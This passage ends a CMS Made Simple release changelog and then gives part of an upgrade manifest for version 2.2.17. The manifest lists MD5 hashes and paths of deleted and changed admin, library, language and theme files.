- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000616162144416536130006333 0ustar00MANIFEST GENERATED: 1686591357
MANIFEST FROM VERSION: 2.2.16
MANIFEST FROM NAME: Truro
MANIFEST TO VERSION: 2.2.17
MANIFEST TO NAME: Iqaluit
DELETED :: c1343427a15458c024494caa3a1e9bc3 :: \lib\phpmailer\class.phpmailer.php
DELETED :: c708aa1378554c94e8f41c202db5468f :: \lib\phpmailer\class.phpmaileroauth.php
DELETED :: 58bde497cccfc3615bdc87ee68750351 :: \lib\phpmailer\class.phpmaileroauthgoogle.php
DELETED :: 36fd1f07e9161bbf02d6456892dc6b24 :: \lib\phpmailer\class.pop3.php
DELETED :: eaf2322fced76ad1bd3e3d1e9e4e35df :: \lib\phpmailer\class.smtp.php
DELETED :: 67cfa9dcb9ca31ce855911e35f7d78fc :: \lib\phpmailer\composer.lock
DELETED :: 42aa2293ad53110d8530b3320b0eb418 :: \lib\phpmailer\language\phpmailer.lang-br.php
DELETED :: 11e65c3b0d68cf7257818f2f89464e63 :: \lib\phpmailer\language\phpmailer.lang-cz.php
DELETED :: 2f2b474f532ab2ee3d92395f3c5b0e0c :: \lib\phpmailer\language\phpmailer.lang-dk.php
DELETED :: a1b040e0649c7af0a015632f7412a73a :: \lib\phpmailer\language\phpmailer.lang-no.php
DELETED :: 1cd8ba8b4125cb428c99fae5d8702158 :: \lib\phpmailer\language\phpmailer.lang-se.php
DELETED :: 3f1b1ab356dfd845d5ebf74ef0b56d99 :: \lib\phpmailer\language\phpmailer.lang-si.php
DELETED :: 406617e590cff6cbd11c69f4a9c6c972 :: \lib\phpmailer\PHPMailerAutoload.php
DELETED :: fce1a50fa6f5a5a31d8d1cb6a4fc6d52 :: \lib\smarty\plugins\shared.mb_wordwrap.php
DELETED :: f4a1c16069fed7db16bd18ec23a6cd7e :: \lib\smarty\SmartyBC.class.php
DELETED :: 20ffbb78ad3e038ddfb588e6c7e55a99 :: \lib\smarty\sysplugins\smarty_config_source.php
DELETED :: 70341d83ea4d159d6a994db9d50014fe :: \lib\smarty\sysplugins\smarty_internal_compile_include_php.php
DELETED :: ed4fff5141d521db75289f82720b52d4 :: \lib\smarty\sysplugins\smarty_internal_compile_private_php.php
DELETED :: 67ba0e2b63fa9f26567de1c27e2996f5 :: \lib\smarty\sysplugins\smarty_internal_config.php
DELETED :: 9cbaa14ca680c747253f5c8c36bdf677 :: \lib\smarty\sysplugins\smarty_internal_filter_handler.php
DELETED :: 689b43f69c9cd3f244ca51e78a4db191 :: \lib\smarty\sysplugins\smarty_internal_function_call_handler.php
DELETED :: a254a209e5526b908eb2b87835c459e5 :: \lib\smarty\sysplugins\smarty_internal_get_include_path.php
DELETED :: f96c17a98939b7c04fc7dd1893cc1a41 :: \lib\smarty\sysplugins\smarty_internal_resource_registered.php
DELETED :: cd69f07c30b629c0a5cda17ce859a3ae :: \lib\smarty\sysplugins\smarty_internal_utility.php
DELETED :: b426067049627418a9954a8f0ce947a5 :: \lib\smarty\sysplugins\smarty_internal_write_file.php
CHANGED :: e589848b0cb1145320ac5b907a3c9920 :: \admin\.htaccess
CHANGED :: f911637a32ce9fb37989e56a69f47f75 :: \admin\addbookmark.php
CHANGED :: 4aecfd68358e25b115c841193df4484b :: \admin\addgroup.php
CHANGED :: df73195fd58dfd2f794a45ac59d69daa :: \admin\adduser.php
CHANGED :: c848a271a51a04fe687988d97e36a0e0 :: \admin\adminlog.php
CHANGED :: 8894824460a6e25ba877e18751384517 :: \admin\ajax_alerts.php
CHANGED :: eb7ab8680b11cbaaf647f9a6efa34902 :: \admin\ajax_content.php
CHANGED :: d9989f55f4c9573264c74b2725996542 :: \admin\ajax_help.php
CHANGED :: 870484b0abd52c3d1e2d76f6257c0b30 :: \admin\ajax_lock.php
CHANGED :: 22698a8d7502d9dbc3046805a9179ad2 :: \admin\changegroupassign.php
CHANGED :: a1d89acd6a61be9a231bfc3dfcd9506f :: \admin\changegroupperm.php
CHANGED :: 90859ae5fc90ba26d67716dc28bae42f :: \admin\checksum.php
CHANGED :: 388e48075a0d8aa4b362e47e0389e406 :: \admin\cms_js_setup.php
CHANGED :: 057c6a828db724d35a86b8b755474839 :: \admin\deletebookmark.php
CHANGED :: 39b88c4466ad9b7d084b674be880e732 :: \admin\deletegroup.php
CHANGED :: 18e265fc43fe2b8af349c4f9bcb14f42 :: \admin\deleteuser.php
CHANGED :: 181bc0de2fda2ce4edf5538418d95f98 :: \admin\deleteuserplugin.php
CHANGED :: 0aac7935f98e5c33542131afc71c34ea :: \admin\editbookmark.php
CHANGED :: 4df9c95afdcc707d4c0eb2665825e9cf :: \admin\editevent.php
CHANGED :: 4c2c140829ce7ce6ec50f323bfd117e5 :: \admin\editgroup.php
CHANGED :: 3ec7df184bdecba2f717359dd1717fb9 :: \admin\edituser.php
CHANGED :: 707a3744f1ca9e7a60f83cc6c95eab88 :: \admin\editusertag.php
CHANGED :: 890dd8a1df7fcef05b60a55fd33f6df3 :: \admin\eventhandlers.php
CHANGED :: 0d96926fbfe2cfec69d5bb55fa66e69d :: \admin\footer.php
CHANGED :: 5d445e2326f6d4c7c3eedba5512b86bb :: \admin\header.php
CHANGED :: 3ce32c615ed98ff31219f3302fcc4b41 :: \admin\index.php
CHANGED :: dbcc78b388511df78dbb78cca458df75 :: \admin\lang\en_US.php
CHANGED :: d086bb0b946a73082465f18a44f050ee :: \admin\lang\ext\af_ZA.php
CHANGED :: 1e50f66420b46cdf23b515c8013a8968 :: \admin\lang\ext\ar_AR.php
CHANGED :: 5e68a99f403d0956f9fcdcfae844069c :: \admin\lang\ext\bg_BG.php
CHANGED :: 69898d51a124417266ccff0d9cd63dbb :: \admin\lang\ext\ca_ES.php
CHANGED :: 6de8704d51b651359b599fd2017ac358 :: \admin\lang\ext\cs_CZ.php
CHANGED :: 0f32fcfbe95ceb4a3e0c30519a1d1c13 :: \admin\lang\ext\da_DK.php
CHANGED :: ba7255f8bf53b80e557baee0fc9883f6 :: \admin\lang\ext\de_DE.php
CHANGED :: 24094096b4c1746fe32f47279967c979 :: \admin\lang\ext\el_GR.php
CHANGED :: d4a5369206103e14d09febc197cef886 :: \admin\lang\ext\en_CY.php
CHANGED :: c5630ae2322e2236f90d11c6d1949694 :: \admin\lang\ext\eo_UY.php
CHANGED :: 2afd872a34146f96ca29790ca1ece108 :: \admin\lang\ext\es_ES.php
CHANGED :: 6200307df92385c383eb5501cd2e141f :: \admin\lang\ext\et_EE.php
CHANGED :: 64a9092957d5a29419bea20929597ef9 :: \admin\lang\ext\eu_ES.php
CHANGED :: dff01ab1d5dadebba6c925d39db67390 :: \admin\lang\ext\fa_FA.php
CHANGED :: 923328e9123dcec2dc035d027129a304 :: \admin\lang\ext\fa_IR.php
CHANGED :: 951e3e6588b582d8b8a5725b5569b199 :: \admin\lang\ext\fi_FI.php
CHANGED :: 37c57910902d0a0e95efff14c57c8472 :: \admin\lang\ext\fr_FR.php
CHANGED :: 90e396f6693fb799c895d6d218a93464 :: \admin\lang\ext\gl_GL.php
CHANGED :: ae4f9df9fa63e6327c73ccb1a0493495 :: \admin\lang\ext\hr_HR.php
CHANGED :: ba83a5688a1d1d19beb4cd25d4cec728 :: \admin\lang\ext\hu_HU.php
CHANGED :: f11e50d4b5a4b4e3349cad65fe0990a3 :: \admin\lang\ext\id_ID.php
CHANGED :: bc9e38d673297538eb053194774b5853 :: \admin\lang\ext\is_IS.php
CHANGED :: c99d909394ca4ac742b37d36de4b83a4 :: \admin\lang\ext\it_IT.php
CHANGED :: e8d9207a0d0791b5b3f6ca7be7cd4694 :: \admin\lang\ext\iw_IL.php
CHANGED :: a2ea3eb2bca69329b4127718a29839a0 :: \admin\lang\ext\ja_JP.php
CHANGED :: 08bd8e1db30d3d2cd524733a1d446222 :: \admin\lang\ext\kz_KZ.php
CHANGED :: 334e5b20968866e0284607bcb920a14e :: \admin\lang\ext\lt_LT.php
CHANGED :: 0d4b8156df6730432edf4e946aab17ca :: \admin\lang\ext\mn_MN.php
CHANGED :: 2ed1125291de99f23a0135a8d162e96c :: \admin\lang\ext\nb_NO.php
CHANGED :: 7aeafe43d627e216293f4d2dd0b32565 :: \admin\lang\ext\nl_NL.php
CHANGED :: 9936fd1e16715f9ebfd86a15a153c4a2 :: \admin\lang\ext\pl_PL.php
CHANGED :: 5b09643005c816da3a3cf10347d7c5e8 :: \admin\lang\ext\pt_BR.php
CHANGED :: 531c855cd854f37c30612b603d38f9c3 :: \admin\lang\ext\pt_PT.php
CHANGED :: d38089e349cf87fcb301642891130786 :: \admin\lang\ext\rm_CH.php
CHANGED :: 24984600f87ae480a703ac05bddaf1b6 :: \admin\lang\ext\ro_RO.php
CHANGED :: bc2baa7821ec4f997c610576e5b5ede3 :: \admin\lang\ext\ru_RU.php
CHANGED :: f8e053c10589a0a99963854df7f435d9 :: \admin\lang\ext\sk_SK.php
CHANGED :: f73900a96083c80a73f6b3593243ae7f :: \admin\lang\ext\sl_SI.php
CHANGED :: d903a7e7fe4a55140c27731538b4eb62 :: \admin\lang\ext\so_SO.php
CHANGED :: c579e9366d65002105e39b777e13bfa0 :: \admin\lang\ext\sr_YU.php
CHANGED :: c128ae830354311fa5018701937ed912 :: \admin\lang\ext\sv_SE.php
CHANGED :: 285b0e437a4f4f96552584e8955fe1eb :: \admin\lang\ext\tr_TR.php
CHANGED :: fb977c5f0f9977c7a797d05cc1dfcf41 :: \admin\lang\ext\uk_UA.php
CHANGED :: ee21ad9cdbf8c798a5902d5c4bb672a0 :: \admin\lang\ext\vi_VN.php
CHANGED :: f1d5f843211bdfe3ca6cea28a9204528 :: \admin\lang\ext\zh_CN.php
CHANGED :: b3f3b325e7241edae60dff436e718bce :: \admin\lang\ext\zh_TW.php
CHANGED :: d5e7c0753dd1459a32876c73656e73ab :: \admin\listbookmarks.php
CHANGED :: c7ebd0f224dca9156a6b29353246ad77 :: \admin\listgroups.php
CHANGED :: 31f842ecc80f4ac551d01873a3af576f :: \admin\listtags.php
CHANGED :: ff0fc7d194e4bb4260f688fc4a9ea1ee :: \admin\listusers.php
CHANGED :: 2f03828b3d7bf8dd1dd69f786745a147 :: \admin\listusertags.php
CHANGED :: eb21ebaf7e81a393b4ccaa44a11fa22f :: \admin\login.php
CHANGED :: a51e9b5a83f19f36b2cd2fc0e817e531 :: \admin\loginstyle.php
CHANGED :: c6be8c013239754cfdbfe76558f7a4f9 :: \admin\logout.php
CHANGED :: 85fe54bcfc439fcea94649b2871984c4 :: \admin\makebookmark.php
CHANGED :: 2c039f8aa2ef0f4d55b0b32a9f6f2b29 :: \admin\moduleinterface.php
CHANGED :: 169a821d3f1b29a1ffff3ce06ecb8f3c :: \admin\myaccount.php
CHANGED :: f90951417f6ab432a29c532865b4d664 :: \admin\plugins\function.admin_icon.php
CHANGED :: 08e847670beaac8fae82e4ef072cc8ce :: \admin\plugins\function.cms_admin_user.php
CHANGED :: 2185748574f2558c603d21800de0a152 :: \admin\plugins\function.cms_filepicker.php
CHANGED :: 59125f1a5c9c1920c28cdf859dc9c03d :: \admin\plugins\function.cms_help.php
CHANGED :: db3b894da0bac0a66ecee7e139720c4b :: \admin\plugins\function.page_error.php
CHANGED :: 296c3cd46c2657cf5d9c3dba1b2069b9 :: \admin\plugins\function.page_selector.php
CHANGED :: 1a171ea22aae9e753bc0d9b1a3df2e13 :: \admin\plugins\function.page_warning.php
CHANGED :: 77d74e937c6fa8e8e045a98755b8440c :: \admin\plugins\function.tab_end.php
CHANGED :: 5db90308a89b44f68a07eada4720a45c :: \admin\plugins\function.tab_header.php
CHANGED :: 38e095f1f7f75aa158a552fa9b0ab683 :: \admin\plugins\function.tab_start.php
CHANGED :: 24fafd995e9d86199ad124212f518cf7 :: \admin\siteprefs.php
CHANGED :: 3de0e7c164a78bfbc336b2fba94f193e :: \admin\style.php
CHANGED :: 38190e9282afdab903eda6314680e9db :: \admin\systeminfo.php
CHANGED :: d0dbbccbb13e3cd06f5fa03c2501091b :: \admin\systemmaintenance.php
CHANGED :: bd41575967afe3253c42ad73d7505f2a :: \admin\templates\adduser.tpl
CHANGED :: 06fa2861dbec80fefdc991c46737e917 :: \admin\templates\adminlog.tpl
CHANGED :: 3b2b654bafc9dbf58536f8f863fbb23f :: \admin\templates\changegroupperm.tpl
CHANGED :: b8f733df104dde8a18fd533320a14a85 :: \admin\templates\changeusergroup.tpl
CHANGED :: 4e33c451527bbadd3037516ff333ecc0 :: \admin\templates\checksum.tpl
CHANGED :: 6abdd4c567de916b19ce699062d5ae2e :: \admin\templates\edituser.tpl
CHANGED :: 54a2a388836ce99db8719e79c58f2eb7 :: \admin\templates\editusertag.tpl
CHANGED :: 161ef1923f0726267e2e427d7fbf354a :: \admin\templates\listtags.tpl
CHANGED :: 5ab72dc425cb86cec2f62a0e2e815be2 :: \admin\templates\listusers.tpl
CHANGED :: a1f3d399343c2a8abd7654840481931a :: \admin\templates\listusertags.tpl
CHANGED :: 3570cdd8a95ffb072fcac51f33278c29 :: \admin\templates\myaccount.tpl
CHANGED :: acb399509c6b67a83baa78c1c0b8d547 :: \admin\templates\ordercontent.tpl
CHANGED :: d62ac28129e9f4560f9066b9dde44472 :: \admin\templates\ordercontent_tree.tpl
CHANGED :: 8ffe33c71e676e3e68b33314ead6ca13 :: \admin\templates\orig_page_template.tpl
CHANGED :: 6c8c4020cbf109bee04e287bd49ad804 :: \admin\templates\siteprefs.tpl
CHANGED :: cd1854bad005b1a5851fc641d29bc0d2 :: \admin\templates\systeminfo.tpl
CHANGED :: c372a6bcd1f90fd83b006f8d7c92a76d :: \admin\templates\systeminfo.txt.tpl
CHANGED :: 017c6dbd5a6efb4017c90bc94415ff74 :: \admin\templates\systemmaintenance.tpl
CHANGED :: 2b912f7c0653008ca28ebacda49025e7 :: \admin\themes\OneEleven\css\default-cmsms\images\animated-overlay.gif
CHANGED :: 087f421d344855021408ef5af34bdf2a :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_flat_0_aaaaaa_40x100.png
CHANGED :: 07f3ba43e70abc5a9c2b93b92093b352 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_flat_75_ffffff_40x100.png
CHANGED :: 6b19225d4fa4da623ddf89574bfc6070 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_glass_55_fbf9ee_1x400.png
CHANGED :: b78f876e52b5fe053f5322f99a7b5520 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_highlight-soft_25_232323_1x100.png
CHANGED :: 007782e59a762ea69162eb103c19dcc3 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_highlight-soft_65_ffffff_1x100.png
CHANGED :: a0b57503e96f29afa167b5a3eeb15499 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_highlight-soft_75_cecece_1x100.png
CHANGED :: 2b7934a9de4d693130eeb5ddb62de4d4 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_highlight-soft_75_fa8004_1x100.png
CHANGED :: 9f06a9f3e405a441094d0cc5e95e8c3b :: \admin\themes\OneEleven\css\default-cmsms\images\ui-bg_inset-soft_95_fef1ec_1x100.png
CHANGED :: 18f3f9ec185da50871a247b8bcfca128 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-icons_147fdb_256x240.png
CHANGED :: 718adb865639de6e636d6dd08c827b7e :: \admin\themes\OneEleven\css\default-cmsms\images\ui-icons_232323_256x240.png
CHANGED :: 5c78585b80fbf4342d21674a04e89c8b :: \admin\themes\OneEleven\css\default-cmsms\images\ui-icons_cd0a0a_256x240.png
CHANGED :: 3f1313b8ea6a1992b03b5d742a6e32f7 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-icons_fa8004_256x240.png
CHANGED :: e3f4748b19b87aadaa924d85f0882432 :: \admin\themes\OneEleven\css\default-cmsms\images\ui-icons_ffffff_256x240.png
CHANGED :: ca31ca0aae4e7a5fcc60f76391119566 :: \admin\themes\OneEleven\css\default-cmsms\jquery-ui-1.10.4.custom.min.css
CHANGED :: 9623579c7d90bc4948c703743df814d5 :: \admin\themes\OneEleven\css\style-rtl.css
CHANGED :: b2b9d986d46963c5f021e9582e03c4a9 :: \admin\themes\OneEleven\css\style.css
CHANGED :: 8813d60e74aaa618408b6103baa04384 :: \admin\themes\OneEleven\doc\AUTHORS.txt
CHANGED :: 01e501560971681cfa79014db3a8ea36 :: \admin\themes\OneEleven\doc\dashboard-screen.JPG
CHANGED :: 4c4d761bb1d20afdb0026ee9baf17037 :: \admin\themes\OneEleven\doc\dashboard-small-screen.JPG
CHANGED :: 46e9be876fa10ea0b31dbe5ddc61806a :: \admin\themes\OneEleven\doc\grid.html
CHANGED :: bb59813e316737b3ae0d174cc3f704f4 :: \admin\themes\OneEleven\doc\login-screen.JPG
CHANGED :: c7ec9867aa0210a076501e92f83726b2 :: \admin\themes\OneEleven\doc\README.txt
CHANGED :: 57b692c88cf7d55f0dfe4b2f84f8e05c :: \admin\themes\OneEleven\images\favicon\apple-touch-icon-ipad.png
CHANGED :: a309cfd521acd3ecbc9a85307f0a76a6 :: \admin\themes\OneEleven\images\favicon\apple-touch-icon-ipad3.png
CHANGED :: 60f466fb4752c1933044c13ab9740194 :: \admin\themes\OneEleven\images\favicon\apple-touch-icon-iphone.png
CHANGED :: c8d36d6720376ac8ee1a382b0b39c8ef :: \admin\themes\OneEleven\images\favicon\apple-touch-icon-iphone4.png
CHANGED :: ebf500d206705bda0cb79021c15da98a :: \admin\themes\OneEleven\images\favicon\cmsms-favicon.ico
CHANGED :: ae76ffdd513dbd661b5c1ba6a8c20caa :: \admin\themes\OneEleven\images\favicon\ms-application-icon.png
CHANGED :: c795a48f8e6b2769a5eb774d42c16b42 :: \admin\themes\OneEleven\images\icons\extra\accept.png
CHANGED :: b450f0af03e7c2cf582c735e1c2876b7 :: \admin\themes\OneEleven\images\icons\extra\block.png
CHANGED :: b88dac490c7f026e14b2e85b08918604 :: \admin\themes\OneEleven\images\icons\extra\close.gif
CHANGED :: a5781575a35e3490223bfe870a897365 :: \admin\themes\OneEleven\images\icons\extra\close.png
CHANGED :: 16c2ebfc03bb803f5b8686e91f5ee452 :: \admin\themes\OneEleven\images\icons\extra\false.gif
CHANGED :: 307ceb684b6f7dcd5e163ed48a0fe766 :: \admin\themes\OneEleven\images\icons\extra\forgot-pass.gif
CHANGED :: 2fa4134fdc0bb4fb27172a95d7971cf8 :: \admin\themes\OneEleven\images\icons\extra\green.gif
CHANGED :: 7c0d8e25551973ceca8082b64bab8602 :: \admin\themes\OneEleven\images\icons\extra\info.png
CHANGED :: 16c2ebfc03bb803f5b8686e91f5ee452 :: \admin\themes\OneEleven\images\icons\extra\red.gif
CHANGED :: afef0768efb7a754e12321c208c8b2a2 :: \admin\themes\OneEleven\images\icons\extra\reorder.gif
CHANGED :: 3d045b93716ed28dc745e648b3428a26 :: \admin\themes\OneEleven\images\icons\extra\space.gif
CHANGED :: 981f95e5e8204ee0413a23f7cef5deff :: \admin\themes\OneEleven\images\icons\extra\spinner.gif
CHANGED :: 0c84d56549a955ba79a678160022eb14 :: \admin\themes\OneEleven\images\icons\extra\warning.png
CHANGED :: 9990091c55e61106823fd630322a11fe :: \admin\themes\OneEleven\images\icons\extra\yellow.gif
CHANGED :: 8631a9f1bc6046976688011c7a3289af :: \admin\themes\OneEleven\images\icons\Notifications\1.gif
CHANGED :: 1bc0ac3f36070d8a755d50d5fcad5ee4 :: \admin\themes\OneEleven\images\icons\Notifications\2.gif
CHANGED :: 032ce8793d7a2df553b14029617d8fa8 :: \admin\themes\OneEleven\images\icons\Notifications\3.gif
CHANGED :: d4ace7bc08606ab60963379d2dac971b :: \admin\themes\OneEleven\images\icons\system\accept.gif
CHANGED :: c427b44c4359465f7a8f2550fee5565c :: \admin\themes\OneEleven\images\icons\system\arrow-d.gif
CHANGED :: ce072abf42204bfde53ec47a6fdc8369 :: \admin\themes\OneEleven\images\icons\system\arrow-l.gif
CHANGED :: 89907483ad95aed48bf4a99801ffc756 :: \admin\themes\OneEleven\images\icons\system\arrow-r.gif
CHANGED :: eab09cfc54bf70da5777f2f41075558e :: \admin\themes\OneEleven\images\icons\system\arrow-u.gif
CHANGED :: 704d7a4e19f4e409fd4a0fc9c50f376a :: \admin\themes\OneEleven\images\icons\system\attachment.gif
CHANGED :: d4f13d1941f5c1910d5e95e064e17c47 :: \admin\themes\OneEleven\images\icons\system\back.gif
CHANGED :: a168258d404d35379ff1abc04ed53c7c :: \admin\themes\OneEleven\images\icons\system\bookmark.gif
CHANGED :: f62637cb7c22f459f4a0cef5a575bae7 :: \admin\themes\OneEleven\images\icons\system\bookmark.png
CHANGED :: 278d72554ffc9c031157720e8342253e :: \admin\themes\OneEleven\images\icons\system\contract.gif
CHANGED :: 27df2789fdda6bf71837f93d85d554d6 :: \admin\themes\OneEleven\images\icons\system\contractall.gif
CHANGED :: 077368bfbcfafc04a4846b0cec0b111f :: \admin\themes\OneEleven\images\icons\system\copy.gif
CHANGED :: 03a6d0010c668251b5d286565d709237 :: \admin\themes\OneEleven\images\icons\system\css.gif
CHANGED :: 0bb36fd46db304fff2a1293898872c55 :: \admin\themes\OneEleven\images\icons\system\delete.gif
CHANGED :: a596cf976084b54149ae702a84383d0f :: \admin\themes\OneEleven\images\icons\system\document-list.png
CHANGED :: eaf69e1479e195d010a2a0ca0f32b8f5 :: \admin\themes\OneEleven\images\icons\system\edit.gif
CHANGED :: 9ee7773f3ba60657f6fae350bfd93378 :: \admin\themes\OneEleven\images\icons\system\expand-rtl.gif
CHANGED :: 6d8da69724912a006745d82ea5481309 :: \admin\themes\OneEleven\images\icons\system\expand.gif
CHANGED :: d355646241a0e340aac57adf5e755930 :: \admin\themes\OneEleven\images\icons\system\expandall.gif
CHANGED :: 37dc27d31997d05e68769970f1ec77c7 :: \admin\themes\OneEleven\images\icons\system\export.gif
CHANGED :: 37c57a0028d8bdc865d5635b68fed27b :: \admin\themes\OneEleven\images\icons\system\external-small.png
CHANGED :: 086bc6fdb8a8728f19e696aa095b01c6 :: \admin\themes\OneEleven\images\icons\system\false.gif
CHANGED :: 3881f3c80a77c07faa02ec5c1188e98f :: \admin\themes\OneEleven\images\icons\system\groupassign.gif
CHANGED :: dfe9060be2bd37fc03b4f85dd9a8fa7d :: \admin\themes\OneEleven\images\icons\system\import.gif
CHANGED :: e5bfb73f3c0e69075d281b2cc4279eea :: \admin\themes\OneEleven\images\icons\system\info-external.gif
CHANGED :: 90f3e054f706c665ebb5fcb1ba0e3cdb :: \admin\themes\OneEleven\images\icons\system\info-external.png
CHANGED :: 755da3fd92de5b48696501c8021af6fe :: \admin\themes\OneEleven\images\icons\system\info.gif
CHANGED :: b9069b9632fdb5cff7b0cc515e81bd3d :: \admin\themes\OneEleven\images\icons\system\newfolder.gif
CHANGED :: 4a846e59368a0d4fbfef2add21331828 :: \admin\themes\OneEleven\images\icons\system\newobject.gif
CHANGED :: 829d83cc3466cd92b6dcd54e0324e2d9 :: \admin\themes\OneEleven\images\icons\system\permissions.gif
CHANGED :: 9d5bf6da7982b96dfc6e3c5eb1188575 :: \admin\themes\OneEleven\images\icons\system\reorder.gif
CHANGED :: c8bfed0cc05a7b87be81793d37081efe :: \admin\themes\OneEleven\images\icons\system\run.gif
CHANGED :: fa4c359cea8548557544ad67a40d84d4 :: \admin\themes\OneEleven\images\icons\system\sort_down.gif
CHANGED :: eab09cfc54bf70da5777f2f41075558e :: \admin\themes\OneEleven\images\icons\system\sort_up.gif
CHANGED :: bb00dd02e7fb209bc2b1c72f841b8e62 :: \admin\themes\OneEleven\images\icons\system\stop.gif
CHANGED :: 2fa4134fdc0bb4fb27172a95d7971cf8 :: \admin\themes\OneEleven\images\icons\system\true.gif
CHANGED :: f3e8a65ed021dbadc088c56374223fe1 :: \admin\themes\OneEleven\images\icons\system\view.gif
CHANGED :: 7120cff738b12256113a16cc4b70b132 :: \admin\themes\OneEleven\images\icons\system\warning.gif
CHANGED :: 9ba7d53470111937836f621cd3108af1 :: \admin\themes\OneEleven\images\icons\topfiles\adminlog.gif
CHANGED :: 02f804f91fbaaf98b678169f52e78fc1 :: \admin\themes\OneEleven\images\icons\topfiles\adminlog.png
CHANGED :: 730bb84258f6f1fbb6f148855806fb9a :: \admin\themes\OneEleven\images\icons\topfiles\blobs.gif
CHANGED :: 7356fea348abc7cfeba3a086e27c472a :: \admin\themes\OneEleven\images\icons\topfiles\blobs.png
CHANGED :: ab1abba3f521e15fcd40544877d18b67 :: \admin\themes\OneEleven\images\icons\topfiles\checksum.gif
CHANGED :: ed097ebcbeae30da62b8119f729d92d0 :: \admin\themes\OneEleven\images\icons\topfiles\checksum.png
CHANGED :: 6c1b61562cadc4fc4d3b1dcc180e2dfe :: \admin\themes\OneEleven\images\icons\topfiles\cmsmailer.gif
CHANGED :: f68e343a2468340225442d9ebe17e10e :: \admin\themes\OneEleven\images\icons\topfiles\cmsmailer.png
CHANGED :: 025c8d6d9d01a601c2d6f81384deab96 :: \admin\themes\OneEleven\images\icons\topfiles\cmsprinting.gif
CHANGED :: ed5d780bf804e6f63db05aa309b80de6 :: \admin\themes\OneEleven\images\icons\topfiles\cmsprinting.png
CHANGED :: 9235ac8603d8f859a5ee67f0014e8efc :: \admin\themes\OneEleven\images\icons\topfiles\content.gif
CHANGED :: e31e398e76a901ea053c00c1d0d25a8f :: \admin\themes\OneEleven\images\icons\topfiles\content.png
CHANGED :: 1db9e0443aa2a8e6017f3a09146ee2ff :: \admin\themes\OneEleven\images\icons\topfiles\ecommerce.gif
CHANGED :: c98a263374c43e4bf141caae5d4351a6 :: \admin\themes\OneEleven\images\icons\topfiles\ecommerce.png
CHANGED :: e01fd9b87d5fb2664b3eeb866eb3d359 :: \admin\themes\OneEleven\images\icons\topfiles\eventhandlers.gif
CHANGED :: 41222ef0b83376d5d73c8c6f77c29376 :: \admin\themes\OneEleven\images\icons\topfiles\eventhandlers.png
CHANGED :: 786bdcd23d63e665121d239118145a08 :: \admin\themes\OneEleven\images\icons\topfiles\extensions.gif
CHANGED :: 19c78d480e39abe04e6b8e98332f6604 :: \admin\themes\OneEleven\images\icons\topfiles\extensions.png
CHANGED :: f6d00ecae5703297b1dc3b93c0d9da81 :: \admin\themes\OneEleven\images\icons\topfiles\filemanager.gif
CHANGED :: f3e56e4a1306c67c6cec07fd74dd306a :: \admin\themes\OneEleven\images\icons\topfiles\filemanager.png
CHANGED :: 9235ac8603d8f859a5ee67f0014e8efc :: \admin\themes\OneEleven\images\icons\topfiles\files.gif
CHANGED :: e31e398e76a901ea053c00c1d0d25a8f :: \admin\themes\OneEleven\images\icons\topfiles\files.png
CHANGED :: 40fa017f58131be3cef1a0f0d78ea78f :: \admin\themes\OneEleven\images\icons\topfiles\groupmembers.gif
CHANGED :: e5ec2092cdda122796e9d581c63c326d :: \admin\themes\OneEleven\images\icons\topfiles\groupmembers.png
CHANGED :: 4745da813c7257a378a619a0a84c7417 :: \admin\themes\OneEleven\images\icons\topfiles\groupperms.gif
CHANGED :: 1fa03a0bddfb19cbac1e860a18e66d2d :: \admin\themes\OneEleven\images\icons\topfiles\groupperms.png
CHANGED :: 40fa017f58131be3cef1a0f0d78ea78f :: \admin\themes\OneEleven\images\icons\topfiles\groups.gif
CHANGED :: e5ec2092cdda122796e9d581c63c326d :: \admin\themes\OneEleven\images\icons\topfiles\groups.png
CHANGED :: 088e7c5a37872e0abfa6b8b833f11ca6 :: \admin\themes\OneEleven\images\icons\topfiles\images.gif
CHANGED :: 0f838e7cb974a6a560a961b7ab45ab0a :: \admin\themes\OneEleven\images\icons\topfiles\images.png
CHANGED :: 678ee8009ec6c59fbec098cc716b3c37 :: \admin\themes\OneEleven\images\icons\topfiles\layout.gif
CHANGED :: 7151b3e216c3dfa71e19714d4a2a0d75 :: \admin\themes\OneEleven\images\icons\topfiles\layout.png
CHANGED :: 2815886dc0a15dc15d365db34d32f874 :: \admin\themes\OneEleven\images\icons\topfiles\main.gif
CHANGED :: c427467d2a4fe2e5e94ce2760fda2494 :: \admin\themes\OneEleven\images\icons\topfiles\main.png
CHANGED :: 48b6240ad6fc2fe20ecb673e2ed7569b :: \admin\themes\OneEleven\images\icons\topfiles\managebookmarks.gif
CHANGED :: bc4af30e9d5b658988d7cda3bcb9a444 :: \admin\themes\OneEleven\images\icons\topfiles\managebookmarks.png
CHANGED :: 454b67301a4ca02cabf6ba865cd0fb09 :: \admin\themes\OneEleven\images\icons\topfiles\microtiny.gif
CHANGED :: 9b6f3d793b977ab14c002063ac2c3063 :: \admin\themes\OneEleven\images\icons\topfiles\microtiny.png
CHANGED :: a04851160e8d8b6c55a52d333ea8b9e0 :: \admin\themes\OneEleven\images\icons\topfiles\modulemanager.gif
CHANGED :: 679cf10fd21acbd683d86ed9156193da :: \admin\themes\OneEleven\images\icons\topfiles\modulemanager.png
